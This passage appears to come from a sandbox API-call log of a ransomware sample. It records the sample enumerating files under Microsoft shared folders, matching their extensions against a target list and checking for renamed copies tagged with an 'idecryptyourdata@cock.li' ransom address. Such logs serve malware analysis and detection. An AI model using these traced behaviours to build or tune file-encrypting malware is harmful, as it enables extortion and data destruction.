shared\\ink\\ipsar.xml") returned 60 [0056.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.412] lstrlenW (lpString=".doc") returned 4 [0056.412] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.412] lstrlenW (lpString=".docx") returned 5 [0056.412] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0056.412] lstrlenW (lpString=".pdf") returned 4 [0056.412] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.412] lstrlenW (lpString=".xls") returned 4 [0056.412] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.412] lstrlenW (lpString=".xlsx") returned 5 [0056.412] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0056.412] lstrlenW (lpString=".ppt") returned 4 [0056.412] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.412] lstrlenW (lpString=".zip") returned 4 [0056.412] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.412] lstrlenW (lpString=".rar") returned 4 [0056.412] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.412] lstrlenW (lpString=".bz2") returned 4 [0056.412] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.412] lstrlenW (lpString=".7z") returned 3 [0056.412] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.413] lstrlenW (lpString=".dbf") returned 4 [0056.413] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.413] lstrlenW (lpString=".1cd") returned 4 [0056.413] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.413] lstrlenW (lpString=".jpg") returned 4 [0056.413] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.413] lstrlenW (lpString=".doc") returned 4 [0056.413] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString=".docx") returned 5 [0056.413] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0056.413] lstrlenW (lpString=".pdf") returned 4 [0056.413] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString=".xls") returned 4 [0056.413] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString=".xlsx") returned 5 [0056.413] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0056.413] lstrlenW (lpString=".ppt") returned 4 [0056.413] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.413] lstrlenW (lpString=".zip") returned 4 [0056.413] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.413] lstrlenW (lpString=".rar") returned 4 [0056.413] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString=".bz2") returned 4 [0056.413] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString=".7z") returned 3 [0056.413] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.413] lstrlenW (lpString=".dbf") returned 4 [0056.413] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.414] lstrlenW (lpString=".1cd") returned 4 [0056.414] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0056.414] lstrlenW (lpString=".jpg") returned 4 [0056.414] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.414] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0056.414] lstrlenW (lpString="ipsdeu.xml") returned 10 [0056.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.488] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=2616) returned 1 [0056.488] CloseHandle (hObject=0x340) returned 1 [0056.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml")) returned 0x20 [0056.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.489] lstrlenW (lpString=".doc") returned 4 [0056.489] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.489] lstrlenW (lpString=".docx") returned 5 [0056.489] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0056.489] lstrlenW (lpString=".pdf") returned 4 [0056.489] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.489] lstrlenW (lpString=".xls") returned 4 [0056.489] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.489] lstrlenW (lpString=".xlsx") returned 5 [0056.489] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0056.489] lstrlenW (lpString=".ppt") returned 4 [0056.489] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.489] lstrlenW (lpString=".zip") returned 4 [0056.489] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.489] lstrlenW (lpString=".rar") returned 4 [0056.489] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.489] lstrlenW (lpString=".bz2") returned 4 [0056.489] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.489] lstrlenW (lpString=".7z") returned 3 [0056.489] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.489] lstrlenW (lpString=".dbf") returned 4 [0056.489] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.489] lstrlenW (lpString=".1cd") returned 4 [0056.490] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.490] lstrlenW (lpString=".jpg") returned 4 [0056.490] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.490] lstrlenW (lpString=".doc") returned 4 [0056.490] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString=".docx") returned 5 [0056.490] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0056.490] lstrlenW (lpString=".pdf") returned 4 [0056.490] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString=".xls") returned 4 [0056.490] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString=".xlsx") returned 5 [0056.490] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0056.490] lstrlenW (lpString=".ppt") returned 4 [0056.490] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.490] lstrlenW (lpString=".zip") returned 4 [0056.490] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.490] lstrlenW (lpString=".rar") returned 4 [0056.490] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString=".bz2") returned 4 [0056.490] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString=".7z") returned 3 [0056.490] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.490] lstrlenW (lpString=".dbf") returned 4 [0056.490] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.490] lstrlenW (lpString=".1cd") returned 4 [0056.490] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 61 [0056.490] lstrlenW (lpString=".jpg") returned 4 [0056.490] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.491] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0056.491] lstrlenW (lpString="ipsfin.xml") returned 10 [0056.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.534] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=2658) returned 1 [0056.535] CloseHandle (hObject=0x340) returned 1 [0056.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml")) returned 0x20 [0056.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.539] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.539] lstrlenW (lpString=".doc") returned 4 [0056.539] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.539] lstrlenW (lpString=".docx") returned 5 [0056.539] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0056.539] lstrlenW (lpString=".pdf") returned 4 [0056.539] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.539] lstrlenW (lpString=".xls") returned 4 [0056.539] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.539] lstrlenW (lpString=".xlsx") returned 5 [0056.539] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0056.539] lstrlenW (lpString=".ppt") returned 4 [0056.539] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.539] lstrlenW (lpString=".zip") returned 4 [0056.539] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.539] lstrlenW (lpString=".rar") returned 4 [0056.539] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.539] lstrlenW (lpString=".bz2") returned 4 [0056.539] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.539] lstrlenW (lpString=".7z") returned 3 [0056.539] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.539] lstrlenW (lpString=".dbf") returned 4 [0056.539] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.540] lstrlenW (lpString=".1cd") returned 4 [0056.540] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.540] lstrlenW (lpString=".jpg") returned 4 [0056.540] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.540] lstrlenW (lpString=".doc") returned 4 [0056.540] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString=".docx") returned 5 [0056.540] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0056.540] lstrlenW (lpString=".pdf") returned 4 [0056.540] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString=".xls") returned 4 [0056.540] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString=".xlsx") returned 5 [0056.540] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0056.540] lstrlenW (lpString=".ppt") returned 4 [0056.540] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.540] lstrlenW (lpString=".zip") returned 4 [0056.540] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.540] lstrlenW (lpString=".rar") returned 4 [0056.540] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString=".bz2") returned 4 [0056.540] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString=".7z") returned 3 [0056.540] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.540] lstrlenW (lpString=".dbf") returned 4 [0056.540] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.540] lstrlenW (lpString=".1cd") returned 4 [0056.540] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 61 [0056.541] lstrlenW (lpString=".jpg") returned 4 [0056.541] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.541] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0056.541] lstrlenW (lpString="ipssrl.xml") returned 10 [0056.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.648] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=2596) returned 1 [0056.648] CloseHandle (hObject=0x340) returned 1 [0056.648] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml")) returned 0x20 [0056.648] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.648] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.648] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.648] lstrlenW (lpString=".doc") returned 4 [0056.648] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.648] lstrlenW (lpString=".docx") returned 5 [0056.649] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0056.649] lstrlenW (lpString=".pdf") returned 4 [0056.649] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString=".xls") returned 4 [0056.649] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString=".xlsx") returned 5 [0056.649] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0056.649] lstrlenW (lpString=".ppt") returned 4 [0056.649] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.649] lstrlenW (lpString=".zip") returned 4 [0056.649] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.649] lstrlenW (lpString=".rar") returned 4 [0056.649] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString=".bz2") returned 4 [0056.649] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString=".7z") returned 3 [0056.649] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.649] lstrlenW (lpString=".dbf") returned 4 [0056.649] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.649] lstrlenW (lpString=".1cd") returned 4 [0056.649] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.649] lstrlenW (lpString=".jpg") returned 4 [0056.649] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.649] lstrlenW (lpString=".doc") returned 4 [0056.649] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString=".docx") returned 5 [0056.649] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0056.649] lstrlenW (lpString=".pdf") returned 4 [0056.649] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.649] lstrlenW (lpString=".xls") returned 4 [0056.649] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.650] lstrlenW (lpString=".xlsx") returned 5 [0056.650] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0056.650] lstrlenW (lpString=".ppt") returned 4 [0056.650] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.650] lstrlenW (lpString=".zip") returned 4 [0056.650] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.650] lstrlenW (lpString=".rar") returned 4 [0056.650] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.650] lstrlenW (lpString=".bz2") returned 4 [0056.650] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.650] lstrlenW (lpString=".7z") returned 3 [0056.650] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.650] lstrlenW (lpString=".dbf") returned 4 [0056.650] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.650] lstrlenW (lpString=".1cd") returned 4 [0056.650] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0056.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 61 [0056.650] lstrlenW (lpString=".jpg") returned 4 [0056.650] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0056.650] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0056.650] lstrlenW (lpString="Garden.htm") returned 10 [0056.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.679] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=231) returned 1 [0056.680] CloseHandle (hObject=0x340) returned 1 [0056.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0056.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.680] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.680] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.680] lstrlenW (lpString=".doc") returned 4 [0056.680] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0056.680] lstrlenW (lpString=".docx") returned 5 [0056.680] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0056.680] lstrlenW (lpString=".pdf") returned 4 [0056.680] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0056.680] lstrlenW (lpString=".xls") returned 4 [0056.680] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0056.680] lstrlenW (lpString=".xlsx") returned 5 [0056.680] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0056.680] lstrlenW (lpString=".ppt") returned 4 [0056.680] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0056.680] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.680] lstrlenW (lpString=".zip") returned 4 [0056.680] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0056.680] lstrlenW (lpString=".rar") returned 4 [0056.680] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0056.681] lstrlenW (lpString=".bz2") returned 4 [0056.681] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0056.681] lstrlenW (lpString=".7z") returned 3 [0056.681] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.681] lstrlenW (lpString=".dbf") returned 4 [0056.681] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.681] lstrlenW (lpString=".1cd") returned 4 [0056.681] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.681] lstrlenW (lpString=".jpg") returned 4 [0056.681] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.681] lstrlenW (lpString=".doc") returned 4 [0056.681] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0056.681] lstrlenW (lpString=".docx") returned 5 [0056.681] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0056.681] lstrlenW (lpString=".pdf") returned 4 [0056.681] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0056.681] lstrlenW (lpString=".xls") returned 4 [0056.681] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0056.681] lstrlenW (lpString=".xlsx") returned 5 [0056.681] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0056.681] lstrlenW (lpString=".ppt") returned 4 [0056.681] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.681] lstrlenW (lpString=".zip") returned 4 [0056.681] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0056.681] lstrlenW (lpString=".rar") returned 4 [0056.681] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0056.681] lstrlenW (lpString=".bz2") returned 4 [0056.681] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0056.681] lstrlenW (lpString=".7z") returned 3 [0056.682] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.682] lstrlenW (lpString=".dbf") returned 4 [0056.682] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0056.682] lstrlenW (lpString="C:\\Program 